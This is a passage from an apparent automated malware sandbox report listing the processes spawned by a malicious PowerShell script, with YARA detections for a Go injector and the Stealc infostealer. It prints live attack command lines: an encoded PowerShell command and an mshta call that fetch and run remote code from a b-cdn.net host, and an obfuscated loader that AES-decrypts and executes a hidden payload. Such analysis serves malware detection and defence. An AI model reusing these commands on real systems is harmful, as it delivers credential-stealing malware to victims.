                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:13:09:57
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:13:09:59
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:13:09:59
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1
                                  Imagebase:0x7ff725720000
                                  File size:14'848 bytes
                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:13:10:01
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Imagebase:0x7ff6eef20000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:5
                                  Start time:13:10:03
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:13:10:03
                                  Start date:10/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:13:10:17
                                  Start date:10/08/2024
                                  Path:C:\Users\user\AppData\Roaming\0SmartAssem.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Roaming\0SmartAssem.exe"
                                  Imagebase:0x7ff74ca60000
                                  File size:14'349'824 bytes
                                  MD5 hash:517C4A0A27D1C022A3319AF316407810
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Go lang
                                  Yara matches:
                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 18%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:13:10:27
                                  Start date:10/08/2024
                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Imagebase:0x6e0000
                                  File size:231'736 bytes
                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:true

                                  Disassembly

                                  Reset < >